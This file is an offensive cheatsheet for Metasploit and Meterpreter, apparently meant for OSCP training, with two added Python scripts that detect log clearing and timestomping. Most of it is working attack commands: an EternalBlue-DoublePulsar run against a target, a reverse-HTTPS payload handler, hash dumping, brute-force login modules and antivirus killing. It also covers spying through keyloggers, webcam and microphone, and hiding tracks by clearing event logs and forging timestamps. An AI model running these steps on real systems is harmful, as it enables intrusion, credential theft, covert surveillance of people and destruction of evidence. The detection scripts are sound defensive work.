forked from OlivierLaflamme/Cheatsheet-God
Cheatsheet_Metasploit&Meterpreter.txt
See [*Metasploit Unleashed Course*](https://www.offensive-security.com/metasploit-unleashed/)
Search for exploits using Metasploit GitHub framework source code:
[*https://github.com/rapid7/metasploit-framework*](https://github.com/rapid7/metasploit-framework)
Translate them for use on OSCP LAB or EXAM.
Metasploit
Metasploit requires PostgreSQL
`systemctl start postgresql`
To enable Postgresql on startup
`systemctl enable postgresql`
MSF Syntax
Start metasploit
`msfconsole`
`msfconsole -q`
Show help for command
`show -h`
Show Auxiliary modules
`show auxiliary`
Use a module
`use auxiliary/scanner/snmp/snmp_enum
use auxiliary/scanner/http/webdav_scanner
use auxiliary/scanner/smb/smb_version
use auxiliary/scanner/ftp/ftp_login
use exploit/windows/pop3/seattlelab_pass`
Show the basic information for a module
`info`
Show the configuration parameters for a module
`show options`
Set options for a module
`set RHOSTS 192.168.1.1-254
set THREADS 10`
Run the module
`run`
Execute an Exploit
`exploit`
Search for a module
`search type:auxiliary login`
Metasploit Database Access
Show all hosts discovered in the MSF database
`hosts`
Scan for hosts and store them in the MSF database
`db_nmap`
Search machines for specific ports in MSF database
`services -p 443`
Use the MSF database to populate RHOSTS with the hosts that have a given port open (here 443)
`services -p 443 --rhosts`
You may find some boxes that are vulnerable to MS17-010 (AKA EternalBlue). Although not officially part of the intended course, this exploit can be leveraged to gain SYSTEM level access to a Windows box. I have never had much luck using the built in Metasploit EternalBlue module. I found that the elevenpaths version works much more reliably. Here are the instructions to install it taken from the following YouTube video:
https://www.youtube.com/watch?v=4OHLor9VaRI
1. First step is to configure Kali to work with 32-bit Wine
`dpkg --add-architecture i386 && apt-get update && apt-get install wine32
rm -r ~/.wine
wine cmd.exe
exit`
2. Download the exploit repository
https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit
3. Move the exploit to /usr/share/metasploit-framework/modules/exploits/windows/smb
4. Start the Metasploit console (using spoolsv.exe as PROCESSINJECT yielded results on OSCP boxes)
`use exploit/windows/smb/eternalblue_doublepulsar
msf exploit(eternalblue_doublepulsar) > set RHOST 10.10.10.10
RHOST => 10.10.10.10
msf exploit(eternalblue_doublepulsar) > set PROCESSINJECT spoolsv.exe
PROCESSINJECT => spoolsv.exe
msf exploit(eternalblue_doublepulsar) > run`
####Experimenting with Meterpreter####
Get system information from Meterpreter Shell
`sysinfo`
Get user id from Meterpreter Shell
`getuid`
Search for a file
`search -f *pass*.txt`
Upload a file
`upload /usr/share/windows-binaries/nc.exe c:\\Users\\Offsec`
Download a file
`download c:\\Windows\\system32\\calc.exe /tmp/calc.exe`
Invoke a command shell from Meterpreter Shell
`shell`
Exit the meterpreter shell
`exit`
Metasploit Exploit Multi Handler
multi/handler to accept an incoming reverse_https meterpreter payload
`use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_https
set LHOST $ip
set LPORT 443
exploit
[*] Started HTTPS reverse handler on https://$ip:443/`
Building Your Own MSF Module
`mkdir -p ~/.msf4/modules/exploits/linux/misc
cd ~/.msf4/modules/exploits/linux/misc
cp /usr/share/metasploit-framework/modules/exploits/linux/misc/gld_postfix.rb ./crossfire.rb
nano crossfire.rb`
Post Exploitation with Metasploit - (available options depend on OS and Meterpreter capabilities)
- `download` Download a file or directory
- `upload` Upload a file or directory
- `portfwd` Forward a local port to a remote service
- `route` View and modify the routing table
- `keyscan_start` Start capturing keystrokes
- `keyscan_stop` Stop capturing keystrokes
- `screenshot` Grab a screenshot of the interactive desktop
- `record_mic` Record audio from the default microphone for X seconds
- `webcam_snap` Take a snapshot from the specified webcam
- `getsystem` Attempt to elevate your privilege to that of local system.
- `hashdump` Dumps the contents of the SAM database
---------------------------------------------------------------------------------------------------------------
####Meterpreter Study Notes
# Basic system commands
background # Put the current session in the background
sessions # List sessions; sessions -h shows help
sessions -i <ID> # Interact with a session; sessions -k <ID> kills it
bgrun / run # Run an existing script; type run and press Tab twice to list the available scripts
info # View information about the current module
getuid # View current user identity
getprivs # View current user privileges
getpid # Get current process ID (PID)
sysinfo # View target machine system information
irb # Open a Ruby shell
ps # View running processes
kill <PID> # Kill the process with the given PID
idletime # View how long the target has been idle
reboot / shutdown # Restart / shut down the target
shell # Enter the target's cmd shell
# Common cmd commands
whoami # Current user / privilege level
quser # Query currently logged-on users
net user # List existing users
net user <username> <password> /add # Add a user with the given password
net localgroup <group> <username> /add # Add the specified user to the specified local group
netstat -ano # List current network connections; LISTENING means the port is waiting for connections, ESTABLISHED means a connection is active
systeminfo # View details of the current computer
tasklist /svc # View the services hosted by each process
taskkill /f /im <program name> # Forcibly end the named program
taskkill /f /pid <PID> # Forcibly end the process with the given PID
tasklist | findstr "string" # Filter the output for the given string
logoff <session ID> # Log off the specified user session
shutdown -r # Restart the current computer
netsh advfirewall set allprofiles state off # Turn off the firewall
# uictl switch keyboard / mouse
uictl [enable/disable] [keyboard/mouse/all] # Enable or disable the keyboard / mouse
uictl disable mouse # Disable the mouse
uictl disable keyboard # Disable the keyboard
# execute run an executable file
execute # Run an executable file on the target machine
execute -H -i -f cmd.exe # Create a new cmd.exe process; -H hidden, -i interactive
execute -H -m -d notepad.exe -f payload.exe -a "-o hack.txt"
# -d Process name shown on the target host while running (for masquerading); -m execute directly from memory
# "-o hack.txt" are the command-line arguments passed to payload.exe
# migrate process migration
getpid # Get the current process's PID
ps # View the currently active processes
migrate <PID> # Migrate the Meterpreter session into the process with the given PID
kill <PID> # Kill the process
# clearev clear logs
clearev # Clear the Application, System and Security event logs on Windows
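The cmd commands above (net user /add, net localgroup /add) and clearev all leave distinctive Windows event IDs behind, which is what a defender looks for. The following is an added example, not code from the cheatsheet or from Metasploit: it triages constructed event records for those IDs and escalates when a log clear follows an account change by the same subject. The event IDs are the real Windows ones; the pipe-delimited record format, the field names and the sample records are assumptions made up for this example.

```python
"""Added example (not from the cheatsheet or from Metasploit): triage constructed
Windows event records for the actions listed above. Real Windows event IDs are
used; the log line format and the sample data are made up for this example."""

from dataclasses import dataclass
from datetime import datetime, timedelta

# Real Windows event IDs for the actions the cheatsheet commands produce.
WATCHED_EVENTS = {
    ("Security", 4720): "user account created (net user /add)",
    ("Security", 4732): "member added to a local security group (net localgroup /add)",
    ("Security", 1102): "Security audit log cleared (clearev)",
    ("System", 104): "System log cleared (clearev)",
}


@dataclass
class Alert:
    ts: str
    channel: str
    event_id: int
    reason: str
    subject: str   # account that performed the action
    detail: str    # target account / group member, if any


def parse_line(line):
    """Constructed format: <ISO timestamp>|<channel>|<event id>|<key=value;key=value...>"""
    ts, channel, event_id, rest = line.strip().split("|", 3)
    fields = dict(kv.split("=", 1) for kv in rest.split(";") if kv)
    return ts, channel, int(event_id), fields


def triage(lines):
    """Return an Alert for every record whose (channel, event id) is watched."""
    alerts = []
    for line in lines:
        if not line.strip():
            continue
        ts, channel, event_id, fields = parse_line(line)
        reason = WATCHED_EVENTS.get((channel, event_id))
        if reason is None:
            continue
        detail = fields.get("MemberName") or fields.get("TargetUserName") or "-"
        alerts.append(Alert(ts, channel, event_id, reason,
                            fields.get("SubjectUserName", "?"), detail))
    return alerts


def correlate(alerts, window=timedelta(minutes=30)):
    """Pair each log-clearing alert with account changes made by the same
    subject inside the preceding window: clearing the logs shortly after
    adding an account or group member is the sequence worth escalating."""
    findings = []
    changes = [a for a in alerts if a.event_id in (4720, 4732)]
    for clear in (a for a in alerts if a.event_id in (1102, 104)):
        t_clear = datetime.fromisoformat(clear.ts)
        for change in changes:
            gap = t_clear - datetime.fromisoformat(change.ts)
            if change.subject == clear.subject and timedelta(0) <= gap <= window:
                findings.append(
                    f"{clear.subject}: {change.reason} at {change.ts}, "
                    f"then {clear.reason} at {clear.ts}")
    return findings


# Constructed sample records (not from a real system).
SAMPLE_LOG = [
    "2019-03-10T11:50:01|Security|4624|SubjectUserName=-;TargetUserName=alice;LogonType=3",
    "2019-03-10T11:55:10|Security|4720|SubjectUserName=alice;TargetUserName=svc_backup",
    "2019-03-10T11:55:11|Security|4732|SubjectUserName=alice;MemberName=svc_backup;TargetUserName=Administrators",
    "2019-03-10T11:56:00|Security|4688|SubjectUserName=alice;NewProcessName=net.exe",
    "2019-03-10T12:02:33|Security|1102|SubjectUserName=alice",
    "2019-03-10T12:02:34|System|104|SubjectUserName=alice",
]

if __name__ == "__main__":
    found = triage(SAMPLE_LOG)
    for a in found:
        print(f"{a.ts} {a.channel}/{a.event_id} {a.reason}: subject={a.subject} detail={a.detail}")
    for f in correlate(found):
        print("ESCALATE:", f)
```

Run as a script it reports the 4720, 4732, 1102 and 104 records and four escalations, because both account changes by alice precede both log clears within the 30-minute window; the 4624 logon and 4688 process-creation records are ignored. A log clear removes the evidence only on the host, so forwarding these channels to a collector before they can be cleared is the control that makes this triage useful.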
# timestomp forge timestamps
timestomp C:\\ -h # View help
timestomp -v C:\\2.txt # View the timestamps of 2.txt
timestomp C:\\2.txt -f C:\\1.txt # Copy the timestamps of 1.txt onto 2.txt
timestomp C:\\test\\22.txt -z "03/10/2019 11:55:55" -v # Set all four timestamps to the same time
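Both timestomp uses above (copying another file's timestamps with -f, setting all of them to one second-granular value with -z) leave patterns a forensic review can pick up. The following is an added example, not code from the cheatsheet or from Metasploit, and it also covers the TIMESTOMP COMMAND glossary entry at the end of this file: it applies three heuristics to a set of file timestamp records. The FileTimes records and every path and time in them are constructed sample data; the heuristics themselves are the usual ones, and the caveat about FAT and ZIP sources is in the comments.

```python
"""Added example (not from the cheatsheet or from Metasploit): heuristics that
point at timestamp manipulation of the kind timestomp performs. The FileTimes
records below are constructed sample data; on a real system you would build
them from os.stat() or, better, from the NTFS $STANDARD_INFORMATION and
$FILE_NAME attributes, since timestomp rewrites only the former."""

from dataclasses import dataclass
from datetime import datetime


@dataclass(frozen=True)
class FileTimes:
    path: str
    modified: datetime
    accessed: datetime
    created: datetime

    def as_tuple(self):
        return (self.modified, self.accessed, self.created)


def suspicious_reasons(f, all_files):
    """Heuristics:
    zero_subsecond         - every timestamp has a zero fractional second. A tool fed
                             'MM/DD/YYYY HH:MM:SS' writes exactly that granularity, while
                             the OS records 100 ns ticks. Files copied from FAT media or
                             extracted from ZIP archives also look like this, so it is a
                             lead, not proof.
    created_after_modified - a file is not normally modified before it was created.
    cloned_from            - another file carries the identical timestamp tuple, which is
                             what copying timestamps with '-f' produces; both members of
                             the pair are reported, the analyst decides which is the donor.
    """
    reasons = []
    if all(t.microsecond == 0 for t in f.as_tuple()):
        reasons.append("zero_subsecond")
    if f.created > f.modified:
        reasons.append("created_after_modified")
    twins = sorted(o.path for o in all_files if o.path != f.path and o.as_tuple() == f.as_tuple())
    if twins:
        reasons.append("cloned_from:" + ",".join(twins))
    return reasons


def scan(files):
    """Return {path: [reasons]} for every file that trips at least one heuristic."""
    hits = {}
    for f in files:
        reasons = suspicious_reasons(f, files)
        if reasons:
            hits[f.path] = reasons
    return hits


# Constructed sample records (not from a real system).
SAMPLE_FILES = [
    FileTimes(r"C:\Users\alice\report.docx",
              datetime(2019, 3, 8, 9, 12, 44, 731205),
              datetime(2019, 3, 9, 17, 30, 2, 118330),
              datetime(2019, 2, 1, 8, 0, 15, 902114)),
    FileTimes(r"C:\1.txt",
              datetime(2019, 3, 5, 14, 20, 31, 4512),
              datetime(2019, 3, 6, 10, 2, 7, 550018),
              datetime(2019, 3, 1, 9, 45, 0, 270441)),
    # 2.txt after 'timestomp C:\\2.txt -f C:\\1.txt': same three values as 1.txt
    FileTimes(r"C:\2.txt",
              datetime(2019, 3, 5, 14, 20, 31, 4512),
              datetime(2019, 3, 6, 10, 2, 7, 550018),
              datetime(2019, 3, 1, 9, 45, 0, 270441)),
    # 22.txt after 'timestomp ... -z "03/10/2019 11:55:55"': all equal, no sub-second part
    FileTimes(r"C:\test\22.txt",
              datetime(2019, 3, 10, 11, 55, 55),
              datetime(2019, 3, 10, 11, 55, 55),
              datetime(2019, 3, 10, 11, 55, 55)),
    # Backdated modified/accessed times but a creation time from the intrusion day
    FileTimes(r"C:\Windows\Temp\dropped.exe",
              datetime(2018, 1, 1, 0, 0, 0),
              datetime(2018, 1, 1, 0, 0, 0),
              datetime(2019, 3, 10, 12, 0, 0)),
]

if __name__ == "__main__":
    for path, reasons in scan(SAMPLE_FILES).items():
        print(path, "->", ", ".join(reasons))
```

Run as a script it reports 1.txt and 2.txt as clones of each other, 22.txt for its zero sub-second timestamps, and dropped.exe for both zero sub-seconds and a creation time later than its modification time, while report.docx passes. Comparing $STANDARD_INFORMATION against $FILE_NAME in the MFT is the stronger check, because timestomp cannot rewrite the latter, but it needs an NTFS parser and is outside this example.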
# portfwd port forwarding
portfwd add -l 1111 -p 3389 -r 127.0.0.1 # Forward port 3389 of the target machine to local port 1111
rdesktop 127.0.0.1:1111 # Prompts for the username and password to connect
rdesktop -u Administrator -p 123 127.0.0.1:1111 # -u username -p password
# autoroute add a route
run autoroute -h # View help
run get_local_subnets # View the target's internal network segments
run autoroute -s 192.168.183.0/24 # Add a route to the target's network segment
run autoroute -p # View the added routes
run post/windows/gather/arp_scanner RHOSTS=192.168.183.0/24
run auxiliary/scanner/portscan/tcp RHOSTS=192.168.183.146 PORTS=3389
# SOCKS proxy
Reference: https://www.freebuf.com/articles/network/125278.html
use auxiliary/server/socks4a
set srvhost 127.0.0.1
set srvport 2000
run
# Common scripts
run arp_scanner -r 192.168.183.1/24 # Use ARP to scan for live hosts
run winenum # Run a set of automated enumeration checks
run credcollect # Collect user hashes
run domain_list_gen # Get the list of domain administrator accounts
run post/multi/gather/env # Get user environment variables
run post/windows/gather/enum_logged_on_users -c # List currently logged-on users
run post/linux/gather/checkvm # Check whether the target is a virtual machine
run post/windows/gather/checkvm # Check whether the target is a virtual machine
run post/windows/gather/forensics/enum_drives # Enumerate drives
run post/windows/gather/enum_applications # Get installed software information
run post/windows/gather/dumplinks # Get recently accessed documents and link (.lnk) information
run post/windows/gather/enum_ie # Get the IE cache
run post/windows/gather/enum_firefox # Get the Firefox cache
run post/windows/gather/enum_chrome # Get the Chrome cache
run post/multi/recon/local_exploit_suggester # Suggest local privilege escalation exploits
run post/windows/gather/enum_patches # Get patch information
run post/windows/gather/enum_domain # Find the domain controller
run post/windows/gather/enum_snmp # Get SNMP community names
run post/windows/gather/credentials/vnc # Get the VNC password
run post/windows/wlan/wlan_profile # Read the target host's WiFi profiles, including passwords
run post/multi/gather/wlan_geolocate # Geolocate the host from nearby WLANs; the result file is stored under /root/.msf4/loot
run post/windows/manage/killav # Stop antivirus software
# Common login brute-force modules
auxiliary/scanner/mssql/mssql_login
auxiliary/scanner/ftp/ftp_login
auxiliary/scanner/ssh/ssh_login
auxiliary/scanner/telnet/telnet_login
auxiliary/scanner/smb/smb_login
auxiliary/scanner/mysql/mysql_login
auxiliary/scanner/oracle/oracle_login
auxiliary/scanner/postgres/postgres_login
auxiliary/scanner/vnc/vnc_login
auxiliary/scanner/pcanywhere/pcanywhere_login
auxiliary/scanner/snmp/snmp_login
auxiliary/scanner/ftp/anonymous
# Keylogger
keyscan_start # Start recording keystrokes
keyscan_dump # Dump the recorded keystrokes
keyscan_stop # Stop recording keystrokes
# Sniffer packet capture
use sniffer
sniffer_interfaces # List network interfaces
sniffer_start 1 # Start capturing on interface 1
sniffer_stats 1 # View capture statistics for interface 1
sniffer_dump 1 /tmp/wlan1.pcap # Export the captured packets to a pcap file
sniffer_stop 1 # Stop capturing on interface 1
sniffer_release 1 # Release the capture buffer for interface 1
# Webcam
record_mic # Record audio
webcam_chat # Open a video chat (a window pops up on the target)
webcam_list # List cameras
webcam_snap # Take a picture with the camera
webcam_stream # Stream the camera video (viewed live in a web page)
# Screen capture
screenshot # Take a screenshot
use espia # Load the espia extension
screengrab # Take a screenshot via espia
# getgui command
run getgui -h # View help
run getgui -e # Enable remote desktop
run getgui -u admin -p admin # Add a user
run getgui -f 6666 -e # Forward port 3389 to local port 6666
---------------------------------------------------------------------------------------------------------------
CORE COMMANDS
? - help menu
background - moves the current session to the background
bgkill - kills a background meterpreter script
bglist - provides a list of all running background scripts
bgrun - runs a script as a background thread
channel - displays active channels
close - closes a channel
exit - terminates a meterpreter session
help - help menu
interact - interacts with a channel
irb - go into Ruby scripting mode
migrate - moves the active process to a designated PID
quit - terminates the meterpreter session
read - reads the data from a channel
run - executes the meterpreter script designated after it
use - loads a meterpreter extension
write - writes data to a channel
FILE SYSTEM COMMANDS
cat - read and output to stdout the contents of a file
cd - change directory on the victim
del - delete a file on the victim
download - download a file from the victim system to the attacker system
edit - edit a file with vim
getlwd - print the local directory
getwd - print working directory
lcd - change local directory
lpwd - print local directory
ls - list files in current directory
mkdir - make a directory on the victim system
pwd - print working directory
rm - delete a file
rmdir - remove directory on the victim system
upload - upload a file from the attacker system to the victim
NETWORK COMMANDS
ipconfig - displays network interfaces with key information including IP address, etc.
portfwd - forwards a port on the victim system to a remote service
route - view or modify the victim routing table
SYSTEM COMMANDS
clearev - clears the event logs on the victim's computer
drop_token - drops a stolen token
execute - executes a command
getpid - gets the current process ID (PID)
getprivs - gets as many privileges as possible
getuid - get the user that the server is running as
kill - terminate the process designated by the PID
ps - list running processes
reboot - reboots the victim computer
reg - interact with the victim's registry
rev2self - calls RevertToSelf() on the victim machine
shell - opens a command shell on the victim machine
shutdown - shuts down the victim's computer
steal_token - attempts to steal the token of a specified (PID) process
sysinfo - gets the details about the victim computer such as OS and name
User Interface Commands
enumdesktops - lists all accessible desktops
getdesktop - get the current meterpreter desktop
idletime - checks to see how long since the victim system has been idle
keyscan_dump - dumps the contents of the software keylogger
keyscan_start - starts the software keylogger when associated with a process such as Word or browser
keyscan_stop - stops the software keylogger
screenshot - grabs a screenshot of the meterpreter desktop
set_desktop - changes the meterpreter desktop
uictl - enables control of some of the user interface components
PRIVILEGE ESCALATION COMMANDS
getsystem - uses 15 built-in methods to gain sysadmin privileges
PASSWORD DUMP COMMAND
hashdump - grabs the hashes in the password (SAM) file
TIMESTOMP COMMAND
timestomp - manipulates the modify, access, and create attributes of a file